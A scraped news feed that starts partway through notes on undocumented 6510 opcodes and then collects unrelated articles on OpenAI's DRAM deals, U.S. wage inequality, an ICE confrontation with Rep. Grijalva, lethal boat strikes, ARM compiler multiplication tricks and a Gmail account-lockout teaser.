EE disappears entirely. Instead of ORing with EE, the accumulator is ORed with certain bits of X and also ORed with certain bits of another "register" (nature unknown, whether it be the data bus, or something else). However, if OAL is preceded by certain other instructions like NOP, the constant value EE reappears and the foregoing does not take place. On my 64, XAA works like this. While X is transfered to A, bit 0 and bit 4 are not. Instead, these bits are ANDed with those bits from A, and the result is stored in A. There may be many variations in the behaviour of both opcodes. XAA #$00 or OAL #$00 are likely quite reliable in any case. It seems clear that the video chip (i.e., VIC-II) bears responsibility for some small part of the anomalousness, at least. Beyond that, the issue is unclear. One idea I'll just throw up in the air about why the two opcodes behave as they do is this observation. While other opcodes like 4B and 6B perform AND as their first step, 8B and AB do not. Perhaps this difference leads to some internal conflict in the microprocessor. Besides being subject to "noise", the actual base operations do not vary. All of the opcodes in this list (at least up to the dividing line) use the naming convention from the CCISA Anthology book. There is another naming convention used, for example in the first issue of C=Hacking. The only assembler I know of that supports undocumented opcodes is Power Assembler. And it uses the same naming conventions as used here. One note on a different topic. A small error has been pointed out in the 64 Programmers Reference Guide with the instruction set listing. In the last row, in the last column of the two instructions AND and ORA there should be an asterisk, just as there is with ADC. That is the indirect,Y addressing mode. In another table several pages later correct information is given. (A correction: There was one error in this document originally. One addressing mode for LAX was given as LAX ab,X. This should have been LAX ab,Y (B7). Also note that Power Assembler apparently has this same error, likely because both it and this document derive first from the same source as regards these opcodes. Coding LAX $00,X is accepted and produces the output B7 00.) References o Joel Shepherd. "Extra Instructions" COMPUTE!, October 1983. o Jim Butterfield. "Strange Opcodes" COMPUTE, March 1993. o Raymond Quirling. "6510 Opcodes" The Transactor, March 1986. o John West, Marko M�kel�. '64doc' file, 1994/06/03.

Sam Altman's Dirty DRAM Deal

Hacker News
www.mooreslawisdead.com
2025-12-06 00:24:55
Comments...
Original Article

Or: How the AI Bubble, Panic, and Unpreparedness Stole Christmas

Written by Tom of Moore’s Law Is Dead

Special Assistance by KarbinCry & kari-no-sugata

ree

Introduction — The Day the RAM Market Snapped

ree

At the beginning of November, I ordered a 32GB DDR5 kit for pairing with a Minisforum BD790i X3D motherboard, and three weeks later those very same sticks of DDR5 are now listed for a staggering $330– a 156% increase in price from less than a month ago! At this rate, it seems likely that by Christmas, that DDR5 kit alone could be worth more than the entire Zen 4 X3D platform I planned to pair it with! How could this happen, and more specifically – how could this happen THIS quickly? Well, buckle up! I am about to tell you the story of Sam Altman’s Dirty DRAM Deal, or: How the AI bubble, panic, and unpreparedness stole Christmas...

But before I dive in, let me make it clear that my RAM kit’s 156% jump in price isn’t a fluke or some extreme example of what's going on right now. Nope, and in fact, I'd like to provide two more examples of how how impossible it is becoming to get ahold of RAM - these were provided by a couple of our sources within the industry:

  1. One source that works at a US Retailer, stated that a RAM Manufacturer called them in order to inquire if they might buy RAM from them to stock up for their other customers. This would be like Corsair asking a Best Buy if they had any RAM around.

  2. Another source that works at a Prebuilt PC company, was recently given an estimate for when they would receive RAM orders if they placed them now…and they were told December…of 2026 !

So what happened?  Well, it all comes down to three perfectly synergistic events:

  1. OpenAI executed two unprecedented RAM deals that took everyone by surprise.

  2. The secrecy and size of the deals triggered full-scale panic buying from everyone else.

  3. The market had almost zero safety stock left due to tariffs, worry about decreasing RAM prices over the summer, and stalled equipment transfers.

Below, we’re going to walk through each of these factors — and then I’m going to warn you about which hardware categories will be hit the hardest, which products are already being cancelled, and what you should buy right now before the shelves turn into a repeat of 2021–2022...because this is doomed to turn into much more than just RAM scarcity...

Part I —OpenAI wasn’t Very “Open”

ree

On October 1st OpenAI signed two simultaneous deals with Samsung and SK Hynix for 40% of the worlds DRAM supply.  Now, did OpenAI’s competition suspect some big RAM deals could be signed in late 2025? Yes. Ok, but did they think it would be deals this huge and with multiple companies? NO!  In fact, if you go back and read reporting on Sam Altman’s now infamous trip to South Korea on October 1st, even just mere hours before the massive deals with Samsung and SK Hynix were simultaneously signed most reporting simply mentioned vague reports about Sam talking to Samsung, SK Hynix, TSMC, and Foxconn. But the reporting at the time was soft, almost dismissive — “exploring ties,” “seeking cooperation,” “probing for partnerships.” Nobody hinted that OpenAI was about to swallow up to 40% of global DRAM output – even on morning before it happened! Nobody saw this coming - this is clear in the lack of reporting about the deals before they were announced, and every MLID Source who works in DRAM manufacturing and distribution insist this took everyone in the industry by surprise.

To be clear - the shock wasn’t that OpenAI made a big deal, no, it was that they made two massive deals this big , at the same time, with Samsung and SK Hynix simultaneously ! In fact, according to our sources - both companies had no idea how big each other's deal was, nor how close to simultaneous they were. And this secrecy mattered. It mattered a lot.

Had Samsung known SK Hynix was about to commit a similar chunk of supply — or vice-versa — the pricing and terms would have likely been different. It’s entirely conceivable they wouldn’t have both agreed to supply such a substantial part of global supply if they had known more... but at the end of the day - OpenAI did succeed in keeping the circles tight, locking down the NDAs, and leveraging the fact that these companies assumed the other wasn’t giving up this much wafer volume simultaneously…in order to make a surgical strike on the global RAM supply chain…and it's worked so far...

Part II — Instant Panic: How did we miss this?

ree

Imagine you're running a hyper scaler, or maybe you’re a major OEM, or perhaps pretend that you are simply one of OpenAI’s chief competitors: On October 1st of 2025, you would have woken up to the news that OpenAI had just cornered the memory market more aggressively than any company in the last decade, and you hadn't heard even a murmur that this was coming beforehand! Well, you would probably make some follow-up calls to colleagues in the industry, and then also quickly hear rumors that it wasn't just you - also the two largest suppliers didn’t even see each other’s simultaneous cooperation with OpenAI coming either ! You wouldn't go: “Well, that’s an interesting coincidence”, no, you would say: “WHAT ELSE IS GOING ON THAT WE DON’T KNOW ABOUT?”

Again – it’s not the size of the deals that's solely the issue here, no, it’s also the unexpectedness and brazenness of them. On October 1st silicon valley executives and procurement managers panicked over concerns like these:

  • What other deals don’t we know about? Is this just the first of many?

  • None of our DRAM suppliers warned us ahead of time! We have to assume they also won't in the future, and that it’s possible all of global DRAM could be bought up without us getting a single warning!

  • We know OpenAI’s competitors are already panic-buying!  If we don’t move now, we might be locked out of the market until 2028!

OpenAI’s competitors, OEMs, and cloud providers scrambled to secure whatever inventory remained out of self-defense , and self-defense in a world that was entirely defenseless due to the accelerant I’ll now explain in Part III...

Part III — There Wasn't any Safety Stock

ree

Normally, the DRAM market has buffers: warehouses of emergency stock, excess wafer starts, older DRAM manufacturing machinery being sold off to budget brands while the big brands upgrade their production lines…but not in 2025, in 2025 those would-be buffers were depleted for three separate reasons:

  1. Tariff Chaos. Companies had deliberately reduced how much DRAM they ordered for their safety stock over the summer of 2025 because tariffs were changing almost weekly. Every RAM purchase risked being made at the wrong moment – and so fewer purchases were made.

  2. Prices had been falling all summer. Because of the hesitancy to purchase as much safety stock as usual, RAM prices were also genuinely falling over time.  And, obviously when memory is getting cheaper month over month, the last thing you’d feel is pressured to buy a commodity that could be cheaper the next month…so everyone waited.

  3. Secondary RAM Manufacturing Had Stalled. Budget brands normally buy older DRAM fabrication equipment from mega-producers like Samsung when Samsung upgrades their DRAM lines to the latest and greatest equipment.  This allows the DRAM market to expand more than it would otherwise because it makes any upgrading of the fanciest production lines to still be additive change to the market. However, Korean memory firms have been terrified that reselling old equipment to China-adjacent OEMs might trigger U.S. retaliation…and so those machines have been sitting idle in warehouses since early spring.

Yep, there was no cushion. OpenAI hit the market at the exact moment it was least prepared.

Part IV — Artificial Scarcity

ree

And now time for the biggest twist of all, a twist that’s actually public information , and therefore should be getting discussed by far more people in this writer's opinion: OpenAI isn’t even bothering to buy finished memory modules! No, their deals are unprecedentedly only for raw wafers — uncut, unfinished, and not even allocated to a specific DRAM standard yet. It’s not even clear if they have decided yet on how or when they will finish them into RAM sticks or HBM!  Right now it seems like these wafers will just be stockpiled in warehouses – like a kid who hides the toybox because they’re afraid nobody wants to play with them, and thus selfishly feels nobody but them should get the toys!

And let’s just say it: Here is the uncomfortable truth Sam Altman is always loath to admit in interviews: OpenAI is worried about losing its lead. The last 18 months have seen competitors catching up fast — Anthropic, Meta, xAI, and specifically Google’s Gemini 3 has gotten a ton of praise just in the past week. Everyone’s chasing training capacity. Everyone needs memory. DRAM is the lifeblood of scaling inference and training throughput. Cutting supply to your rivals is not a conspiracy theory. It’s a business tactic as old as business itself.  And so, when you consider how secretive OpenAI was about their deals with Samsung and SK Hynix, but additionally how unready they were to immediately utilize their warehouses of DRAM wafers – it sure seems like a primary goal of these deals was to deprive the market , and not just an attempt to protect OpenAI's own supply…

Part V — What will be cancelled? What should you buy now?

ree

Alright, now that we are done explaining the how , let’s get to the “ now what?” – because even if the RAM shortage miraculously improves immediately behind the scenes – even if the AI Bubble instantly popped or 10 companies started tooling up for more DRAM capacity this second (and many are, to be fair), at a minimum the next six to nine months are already screwed . See above: DRAM manufactures are quoting 13-Month lead times for DDR5! This is not a temporary blip. This could be a once-in-a-generation shock. So what gets hit first? What gets hit hardest? Well, below is an E through S-Tier ranking of which products are "the most screwed":

  • S-Tier (Already Screwed – Too Late to Buy) -

    • RAM itself, obviously. RAM prices have “exploded”. The detonation is in the past.

  • A-Tier (Almost Screwed – Don’t Wait to Buy!!!)

    • SSDs. These tends to follow DRAM pricing with a lag.

    • Small Prebuilt PC Companies. That lack large buffers of inventory.

    • RADEON GPUs . AMD doesn’t bundle RAM in their BOM kits to AIBs the way Nvidia does. In fact, the RX 9070 GRE 16GB this channel leaked months ago is almost certainly cancelled according to our sources .

    • XBOX. Microsoft didn’t plan. Prices may rise and/or supply may dwindle in 2026.

  • B-Tier (Eventually Screwed – Don’t wait much longer to buy!)

    • Nvidia GPUs. Nvidia maintains large memory inventories for its board partners, giving them a buffer. But high-capacity GPUs (like a hypothetical 24GB 5080 SUPER) are on ice for now because those stores were never sufficiently built up. In fact, Nvidia is quietly telling partners that their SUPER refresh “might” launch Q3 2026 – although most partners think it’s just a placeholder for when Nvidia expects new capacity to come online, and thus SUPER may never launch.

  • C-Tier (Think about buying soon)

    • Laptops and phones. These companies negotiate immense long-term contracts, so they’re not hit immediately. But once their stockpiles run dry, watch out!

  • D-Tier (Consider buying soon, but there’s no rush)

    • PlayStation. Sony planned better than almost anyone else. They bought aggressively during the summer price trough, which is why they can afford a Black Friday discount while everyone else is raising prices.

  • E-Tier (Prices might actually drop )

    • Anything without RAM. Specifically CPUs that do not come with coolers could see price drops over time since there could be a drop in demand for CPUs if nobody has the RAM to feed them in systems.

  • ???-Tier —Steam Machine. Valve keeps things quiet, but the big unknown is whether they pre-bought RAM months ago before announcing their much-hyped Steam Machine. If they did already stockpile an ample supply of DDR5 - then Steam Machine should launch fine, but supply could dry up temporarily at some point while they wait for prices to drop. However, if they didn’t plan ahead - expect a high launch price and very little resupply…it might even need to be cancelled or there might need to be a variant offered without RAM included (BYO RAM Edition!).

And that’s it! This last bit was the most important part of the article in this writer's opinion – an attempt at helping you avoid getting burned. Well, actually, there is one other important reason for this article’s existence I'll tack onto the end – a hope that other people start digging into what’s going on at OpenAI.  I mean seriously – do we even have a single reliable audit of their financials to back up them outrageously spending this much money… for this? Heck, I’ve even heard from numerous sources that OpenAI is “buying up the manufacturing equipment as well” – and without mountains of concrete proof, and/or more input from additional sources on what that really means…I don’t feel I can touch that hot potato without getting burned… but I hope someone else will…

Sources:

The $79 Trillion Heist

Portside
portside.org
2025-12-06 00:21:21
The $79 Trillion Heist barry Fri, 12/05/2025 - 19:21 ...
Original Article

If you depend on investments for most of your income, this is a pretty damn good time. The University of Michigan’s November survey of consumer sentiment finds that Americans who don’t own stock have their lowest confidence level in the economy since the survey began querying stock ownership in 1998. An exception to this mood, the survey notes, is found among the largest stock owners, whose assessment of the economy has actually risen by 11 percent this year.

As Emma Janssen has reported in these pages , marketers are going where the money is, like bank robber Willie Sutton. First-class and business-seat travel on the airlines is booming, so much so that seating arrangements on Delta and United are being reconfigured to create more room for the affluent, while coach seats are going unfilled and “discount” airlines struggle. Revenues are up 3 percent this year at the Ritz-Carltons, the Four Seasons, and other luxury hotels, yet down by 3 percent at economy hotels. And when it comes to life’s biggest purchase—a home—the median age of first-time buyers reached 40 this year, an all-time high according to the National Association of Realtors .

“All right,” as John Dos Passos wrote in his U.S.A. trilogy in the depth of the Depression, “we are two nations.”

Life in the nonaffluent nation is getting harder. According to a Brookings Institution analysis from last year, 43 percent of American families don’t earn enough to pay for housing, food, health care, child care, and transportation; every week, they must juggle which to pay and which not to pay. Among Black and Latino families, those figures rise to 59 percent and 66 percent, respectively.

It has not been ever thus. In the roughly 30 years following the end of World War II, the nation experienced an unprecedented period of broadly shared prosperity, with workers’ incomes rising in tandem with the nation’s growth in productivity. In 1947, workers captured 70 percent of the total national income; today, that has fallen to roughly 59 percent, while investment income has gained at workers’ expense. As a landmark 1995 study by economists Larry Mishel and Jared Bernstein for the Economic Policy Institute (EPI) revealed, a gap between the rise in productivity and the rise in median workers’ wages opened in the mid-1970s and has grown steadily wider since then; the difference between those two rates today is 55 percent . In the years between 1948 and 1979, when the egalitarian legacy of the New Deal was at its apogee, with high levels of unionization and progressive taxation and constraints on the financial sector, productivity grew by 108 percent and median worker’s compensation by 93 percent. In the years between 1979 and 2025, an EPI analysis found productivity grew by 87 percent but median worker’s compensation by a bare 33 percent.

The declining share of national income going to workers hasn’t entirely been the result of the shift from wage income to investment income. There’s also been a shift in the distribution of corporate income to the most highly paid employees, through stock options and other forms of compensation. A 2021 EPI study shows that between 1979 and 2019, real yearly wages for the bottom 90 percent of workers increased by 26 percent, while the wages of those in the 95th to 99th percentile increased by 75 percent, for those in the top 1 percent by 160 percent, and for those in the top 0.1 percent by 345 percent. Worker pay ratios over the past decade have shown that CEOs usually make about 300 times what their median-paid employee makes, a far cry from the 1960s, when the ratio was roughly 20-to-1. Even as labor unions have largely disappeared in the past 60 years, the union of American CEOs—routinely appointed to the executive compensation committees of corporate boards with the blessing or at the instigation of the CEO whose pay they’re setting—has retained its power, adhering to the creed that an injury to one CEO (by, say, paying him or her less than 300 times what workers make) is an injury to all.

What would America look like if the gap between worker pay and productivity hadn’t opened? A RAND Corporation study from earlier this year found that the bottom 90 percent of wage earners received about 67 percent of all taxable income in 1975. In 2019, the last year for which this data was available, they received 46.8 percent. Had that bottom 90 percent continued during the past half-century to make the same share of the national income they’d had in 1975, RAND calculates that by 2023 they would have made an additional $79 trillion . Just in the year 2023, they would have made an additional $3.9 trillion. As the size of the bottom 90 percent of the U.S. workforce is roughly 140 million people, that means that the average earner would have made about $28,000 more in 2023 than they actually did.

Where have all those missing $28,000 paychecks gone? Well, our nation was home to 1,135 billionaires this year, whose aggregate net worth in 2024 came to a cozy $5.7 trillion. That’s $1.8 trillion more than what it would take to cut 140 million $28,000 paychecks.

Corporations aren’t cutting those checks. As EPI’s Nominal Wage Tracker documents, the 80 percent of corporate income that went to employees in 1980 declined to 71.5 percent this year.

This is the kind of thing that can irritate workers. As I write in mid-November, 3,200 members of the Machinists union have just completed a three-month strike at three Midwestern Boeing plants. Strikers noted that Boeing devoted $68 billion to stock buybacks between 2010 and 2024—funds that could have gone to developing safer and better planes, and better-compensated workers with more secure retirement benefits.

THERE’S A REASON WHY 1979 HAS BECOME the last “postwar normal” year, before the massive upward redistribution of wealth and income, in most of these economic studies. In 1980, Ronald Reagan was elected president. In his first few months in office, he signed a law reducing the top income tax rate from 70 percent to 50 percent. (It’s about ten points lower than that today, though most of our super-rich have found ways to get it much closer to zero.) The high marginal tax rates of the postwar decades, peaking at 91 percent during Republican Dwight Eisenhower’s presidency, had effectively put a ceiling on CEO pay. Tesla’s board would not be committing to pay Elon Musk a trillion bucks if Tesla thrives in the coming years under 1950s-era tax rates, where the feds would take the lion’s share above the top marginal bracket. The pre-Reagan tax rates ensured that America’s billionaires would be few and far between, helping to ensure that workers’ potential income wouldn’t be siphoned upward. Twenty years after Reagan, George W. Bush became the first president to lower taxes on the rich during wartime (a war he decided to start absent a plausible threat), and Donald Trump’s successive cuts make even Reagan and Bush look like Keynesians.

In 1982, Reagan’s appointees to the Securities and Exchange Commission (SEC) changed a rule that enabled shareholders to claim a greater percentage of corporate wealth. The SEC permitted corporate executives to authorize buybacks of the corporation’s stock, thereby raising the value of the remaining shares on the market. By the 1990s, due to a Clinton-era loophole exempting bonus compensation from corporate taxes, corporations began paying their top executives with shares and options of shares, which made buybacks an easy form of self-enrichment. As economist William Lazonick has exhaustively documented, by the 2000s, most major corporations were diverting more funds to buybacks and dividends than they were investing in growth and research, not to mention employees’ raises.

During his first year in office, Reagan also busted PATCO, the air traffic controllers’ union, firing all its members when they went on strike. (By contrast, Republican Richard Nixon had allowed all hundreds of thousands of postal workers who’d participated in a wildcat strike in 1970 to return to their jobs: The Republican Party of Nixon’s day was still closer to the accept-the-New-Deal ethos of Eisenhower than the overturn-the-New-Deal ethos of Reagan.) Reagan’s mass firing inspired private-sector CEOs to do the same with their own employees. During the next several years, a representative sample of leading corporations—Phelps Dodge, Greyhound Bus, Boise Cascade, International Paper, Hormel meatpacking—all slashed pay to provoke strikes, then fired the strikers and hired their replacements at a fraction of their original salaries.

During the years of postwar prosperity, strikes were a routine part of the economic landscape, and a major reason why worker pay constituted a decent share of the national income. After PATCO, they nearly disappeared. The number of major strikes plummeted from 286 a year in the 1960s and 1970s, to 83 a year in the 1980s, to 35 a year in the 1990s, to 20 a year in the 2000s. In recent years, the strike has enjoyed a modest revival—autoworkers and teaching assistants have won higher wages by walking picket lines—but unions have shrunk to the point that the fruits of such victories have limited ripple effects.

Reagan wasn’t the sole agent of upward redistribution during this time. Federal Reserve Chair Paul Volcker brought down inflation by raising interest rates so high that people stopped buying cars and construction projects slowed to a trickle. The industrial Midwest never recovered. Between 1979 and 1983, 2.4 million manufacturing jobs vanished. The number of U.S. steelworkers went from 450,000 at the start of the 1980s to 170,000 at decade’s end, even as the wages of those who remained shrank by 17 percent. The decline in auto manufacturing was even more precipitous, from 760,000 employees in 1978 to 490,000 three years later. These were the jobs whose union contracts had set the standard for the nation’s blue-collar workers.

Finally, also in 1981, at New York’s Pierre Hotel, Jack Welch, General Electric’s new CEO, delivered a kind of inaugural address, which he titled “Growing Fast in a Slow-Growth Economy.” GE, Welch proclaimed, would shed all its divisions that weren’t number one or number two in their markets. If that meant shedding workers, so be it. All that mattered was pushing the company to pre-eminence, and the measure of a company’s pre-eminence was its stock price. Between late 1980 and 1985, Welch reduced the number of GE employees from 411,000 to 299,000. He cut basic research. The company’s stock price soared. And Welch became the model CEO for a corporate America going fully neoliberal.

WHAT THE EARLY 1980S INAUGURATED GREW APACE over the subsequent 40 years. Emboldened by Reagan’s opposition to unions, CEOs and corporate boards routinely directed their companies to violate the laws that had empowered workers to form and join unions. In 2016 and 2017, employers were charged with violating the National Labor Relations Act in 41.5 percent of all unionization campaigns, often by firing workers involved in those campaigns. The penalties for being found guilty of such charges are negligible, and Democrats’ efforts to amend the NLRA so that the penalties actually have some effect on employer conduct have never been able to win the support of the 60 senators required to break a filibuster to enact such amendments. So it is that most unionized private companies were unionized many decades ago, and almost all the major companies that have been created since (including the two largest private-sector employers, Walmart and Amazon) have rebuffed their employees’ unionization efforts through illegal threats and firings.

ICE Denies Pepper-Spraying Rep. Adelita Grijalva in Incident Caught on Video

Intercept
theintercept.com
2025-12-06 00:19:09
Heavily armed tactical teams fired crowd suppression munitions at the Arizona lawmaker and protesters, claiming she was leading “a mob.” The post ICE Denies Pepper-Spraying Rep. Adelita Grijalva in Incident Caught on Video appeared first on The Intercept....
Original Article

Federal immigration agents pepper-sprayed and shot crowd suppression munitions at newly sworn-in Arizona Rep. Adelita Grijalva during a confrontation with protesters in Tucson on Friday.

A video Grijalva posted online shows an agent in green fatigues indiscriminately dousing a line of several people — Grijalva included — with pepper spray outside a popular taco restaurant.

“You guys need to calm down and get out,” Grijalva says, coughing amid a cloud of spray. In another clip, an agent fires a pepper ball at Grijalva’s feet.

Department of Homeland Security assistant secretary Tricia McLaughlin denied that Grijalva was pepper-sprayed in a statement, saying that if her claims were true, “this would be a medical marvel. But they’re not true. She wasn’t pepper sprayed.”

“She was in the vicinity of someone who *was* pepper sprayed as they were obstructing and assaulting law enforcement,” McLaughlin continued. The comment suggested a lack of understanding as to how pepper spray works. Fired from a distance, pepper-spray canisters create a choking cloud that will affect anyone in the vicinity, as Grijalva’s video showed.

In a separate video Grijalva posted to Facebook, the Democratic representative from Southern Arizona described community members confronting approximately 40 Immigration and Customs Enforcement agents in several vehicles.

“I was here, this is like the restaurant I come to literally once a week,” she said, “and was sprayed in the face by a very aggressive agent, pushed around by others.” Grijalva maintained that she was not being aggressive. “I was asking for clarification,” she said. “Which is my right as a member of Congress.”

Video from journalists on the ground show dozens of heavily armed agents — members ICE’s high-powered Homeland Security Investigations wing and the Department of Homeland Security’s SWAT-style Special Response teams — deploying flash-bang grenades, tear gas, and pepper-ball rounds at a crowd of immigrant rights protesters near Taco Giro, a popular mom-and-pop restaurant in west Tucson.

According to McLaughlin, two “law enforcement officers were seriously injured by this mob that Rep. Adelita Grijalva joined.” She provided no evidence or details for the claim.

“Presenting one’s self as a ‘Member of Congress’ doesn’t give you the right to obstruct law enforcement,” McLaughlin wrote. The DHS press secretary did not respond to a question about the munitions fired at Grijalva’s feet.

Grijalva “was doing her job, standing up for her community,” Sen. Ruben Gallego, D-Ariz., said in a social media post Friday. “Pepper-spraying a sitting member of Congress is disgraceful, unacceptable, and absolutely not what we voted for. Period.”

Additional footage from Friday’s scene shows Grijalva and members of the media face-to-face with several heavily armed, uniformed Homeland Security Investigation agents as they loaded at least two people — both with their hands zip-tied behind their backs — into a large gray van.

Grijalva identifies herself as a member of Congress and asks where they are being taken. One of the masked agents initially replies, “I can’t verify that.” Another pushes the congresswoman and others back with forearm. “Don’t push me,” Grijalva says multiple times. A third masked agent steps in front of the Arizona lawmaker, makes a comment about “assaulting a federal officer,” and then says the people taken into custody would be transferred to “federal jail.”

“We saw people directly sprayed, members of our press, everybody that was with me, my staff member, myself,” Grijalva said in her video report from Friday’s chaotic scene. She described the events as the latest example of a Trump administration that is flagrantly flouting the rule of law, due process, and the Constitution.

“They’re literally disappearing people from the streets,” she said. “I can just only imagine how if they’re going to treat me like that, how they’re treating other people.”

The violence Grijalva experienced Friday marked the latest chapter in what has been a dramatic year for Arizona’s first Latina representative.

Grijalva won a special election in Arizona’s 7th Congressional District earlier this year to replace her father, Raúl Grijalva, a towering progressive figure in the state who represented Tucson for more than 20 years before passing away in March.

Republican Speaker of the House Mike Johnson delayed the younger Grijalva’s swearing in for nearly two months amid the longest government shutdown in history. Grijalva would add the deciding signature on a discharge petition to release files related to convicted sex trafficker Jeffrey Epstein, which she signed immediately after taking office.

Boat Strike Survivors Clung to Wreckage for Some 45 Minutes Before U.S. Military Killed Them

Intercept
theintercept.com
2025-12-06 00:07:45
“There are a lot of disturbing aspects. But this is one of the most disturbing.” The post Boat Strike Survivors Clung to Wreckage for Some 45 Minutes Before U.S. Military Killed Them appeared first on The Intercept....
Original Article

Two survivors clung to the wreckage of a vessel attacked by the U.S. military for roughly 45 minutes before a second strike killed them on September 2. After about three quarters of an hour, Adm. Frank Bradley, then head of Joint Special Operations Command, ordered a follow-up strike — first reported by The Intercept in September — that killed the shipwrecked men, according to three government sources and a senior lawmaker.

Two more missiles followed that finally sank the foundering vessel. Bradley, now the chief of Special Operations Command, claimed that he conducted multiple strikes because the shipwrecked men and the fragment of the boat still posed a threat, according to the sources.

Secretary of War Pete Hegseth distanced himself from the follow-up strike during a Cabinet meeting at the White House, telling reporters he “didn’t personally see survivors” amid the fire and smoke and had left the room before the second attack was ordered. He evoked the “fog of war” to justify the decision for more strikes on the sinking ship and survivors.

Rep. Adam Smith, D-Wash., the ranking member of the House Armed Services Committee, said Hegseth provided misleading information and that the video shared with lawmakers Thursday showed the reality in stark light.

“We had video for 48 minutes of two guys hanging off the side of a boat. There was plenty of time to make a clear and sober analysis,” Smith told CNN on Thursday. “You had two shipwrecked people on the top of the tiny little bit of the boat that was left that was capsized. They weren’t signaling to anybody. And the idea that these two were going to be able to return to the fight — even if you accept all of the questionable legal premises around this mission, around these strikes — it’s still very hard to imagine how these two were returning to any sort of fight in that condition.”

Three other sources familiar with briefings by Bradley provided to members of the House Permanent Select Committee on Intelligence and the Senate and House Armed Services committees on Thursday confirmed that roughly 45 minutes elapsed between the first and second strikes. “They had at least 35 minutes of clear visual on these guys after the smoke of the first strike cleared. There were no time constraints. There was no pressure. They were in the middle of the ocean and there were no other vessels in the area,” said one of the sources. “There are a lot of disturbing aspects. But this is one of the most disturbing. We could not understand the logic behind it.”

The three sources said that after the first strike by U.S. forces, the two men climbed aboard a small portion of the capsized boat. At some point the men began waving to something overhead, which three people familiar with the briefing said logically must have been U.S. aircraft flying above them. All three interpreted the actions of the men as signaling for help, rescue, or surrender.

“They were seen waving their arms towards the sky,” said one of the sources. “One can only assume that they saw the aircraft. Obviously, we don’t know what they were saying or thinking, but any reasonable person would assume that they saw the aircraft and were signaling either: don’t shoot or help us. But that’s not how Bradley saw it.”

Special Operations Command did not reply to questions from The Intercept prior to publication.

During the Thursday briefings, Bradley claimed that he believed there was cocaine in the quarter of the boat that remained afloat, according to the sources. He said the survivors could have drifted to land or to a rendezvous point with another vessel, meaning that the alleged drug traffickers still had the ability to transport a deadly weapon — cocaine — into the United States, according to one source. Bradley also claimed that without a follow-up attack, the men might rejoin “the fight,” another source said.

Sen. Tom Cotton, R-Ark., echoed that premise, telling reporters after the briefings that the additional strikes on the vessel were warranted because the shipwrecked men were “trying to flip a boat, loaded with drugs bound for the United States, back over so they could stay in the fight.”

None of the three sources who spoke to The Intercept said there was any evidence of this. “They weren’t radioing anybody and they certainly did not try to flip the boat. [Cotton’s] comments are untethered from reality,” said one of the sources.

Sarah Harrison, who previously advised Pentagon policymakers on issues related to human rights and the law of war, said that the people in the boat weren’t in any fight to begin with. “They didn’t pose an imminent threat to U.S. forces or the lives of others. There was no lawful justification to kill them in the first place let alone the second strike,” she told The Intercept. “The only allegation was that the men were transporting drugs, a crime that doesn’t even carry the death penalty.”

The Justice Department’s Office of Legal Counsel this summer produced a classified opinion intended to shield service members up and down the chain of command from prosecution. The legal theory advanced in the finding claims that narcotics on the boats are lawful military targets because their cargo generates revenue, which can be used to buy weaponry, for cartels whom the Trump administration claims are in armed conflict with the U.S.

The Trump administration claims that at least 24 designated terrorist organizations are engaged in “non-international armed conflict” with the United States including the Venezuelan gang Tren de Aragua; Ejército de Liberación Nacional, a Colombian guerrilla insurgency; Cártel de los Soles, a Venezuelan criminal group that the U.S. claims is “headed by Nicolas Maduro and other high-ranking Venezuelan individuals”; and several groups affiliated with the Sinaloa Cartel.

The military has carried out 22 known attacks, destroying 23 boats in the Caribbean Sea and eastern Pacific Ocean since September, killing at least 87 civilians . The most recent attack occurred in the Pacific Ocean on Thursday and killed four people.

Since the attacks began, experts in the laws of war and members of Congress, from both parties , have said the strikes are illegal extrajudicial killings because the military is not permitted to deliberately target civilians — even suspected criminals — who do not pose an imminent threat of violence.

Taavi Väänänen: How to import a new Wikipedia language edition (in hard mode)

PlanetDebian
taavi.wtf
2025-12-06 00:00:00
I created latest Wikipedia language edition, the Toki Pona Wikipedia, last month. Unlike most other wikis which start their lives in the Wikimedia Incubator before the full wiki is created, in this case the community had been using a completely external MediaWiki site to build the wiki before it was...

ARM's barrel shifter tricks

Lobsters
xania.org
2025-12-05 23:51:21
Comments...
Original Article

Written by me, proof-read by an LLM.
Details at end.

Yesterday we talked about how the compiler handles multiplication with a constant on x86. x86 has some architectural quirks (like lea ) that give the compiler quite some latitude for clever optimisations. But do other processors have similar fun quirks?

Today we’re going to look at what code gets generated for the ARM processor. Let’s see how our examples come out:

Here we see ARM’s orthogonal and sensible instruction 2 set, along with its superpower: the barrel shifter. On ARM, many instructions can include a shift of the second operand. While not always completely “free” on modern processors 1 , it’s cheap enough that the compiler can use it to avoid separate shift instructions.

Multiplying by 2 is just a shift:

mul_by_2(int):
  lsl w0, w0, #1    ; w0 = w0 << 1
  ret

Multiplying by 3 is an add with w0 plus itself left shifted by 1, as a single instruction:

mul_by_3(int):
  add w0, w0, w0, lsl #1  ; w0 = w0 + (w0 << 1)
  ret

Multiplying by 4 and 16 are also simple shifts, but there’s no shortcut for multiplying by 25 or 522: The compiler has to generate a multiply instruction there.

It’s also interesting that the operands can’t be constant values except for mov ; so the constant value of 25 or 522 have to be loaded before they can be used in the multiply. ARM has a fixed-size instruction format - every instruction is 4 bytes long 3 , so there’s limited space to pack all the operands in.

On older 32-bit ARM there’s an even cooler trick to let us multiply by one-less-than-a-power-of-two, using rsb (reverse subtract, dest = op2 - op1 ). If we pick 32-bit armv7 we get to see this in action:

mul_by_7(int):
  rsb r0, r0, r0, lsl #3    ; r0 = (r0 << 3) - r0
  bx lr

Here in a single instruction it calculates result = (8 * x) - x . Cool stuff, but only on 32-bit ARMs. I guess that’s the price of progress? 4

Different architectures, different tricks: x86 has lea , ARM has the barrel shifter. The compiler knows them all, so we don’t have to.

See the video that accompanies this post.


This post is day 5 of Advent of Compiler Optimisations 2025 , a 25-day series exploring how compilers transform our code.

This post was written by a human ( Matt Godbolt ) and reviewed and proof-read by LLMs and humans.

Support Compiler Explorer on Patreon or GitHub , or by buying CE products in the Compiler Explorer Shop .

Posted at 06:00:00 CST on 5 th December 2025.

Dithering: ‘Alan Dye Leaves Apple’

Daring Fireball
dithering.passport.online
2025-12-05 23:25:09
Dithering is my and Ben Thompson’s twice-a-week podcast — 15 minutes per episode, not a minute less, not a minute more. It’s a $7/month or $70/year subscription, and included in the Stratechery Plus bundle (a bargain). This year our CMS (Passport — check it out) gained a feature that lets us ma...

Google 'Looking into' Gmail Hack Locking Users Out with No Recovery

Hacker News
www.forbes.com
2025-12-05 23:18:56
Comments...
Original Article
Gmail logo on a smartphone, with Google colors in background of image.

This devastating Gmail attack locks users out of their accounts with no comeback.

SOPA Images/LightRocket via Getty Images

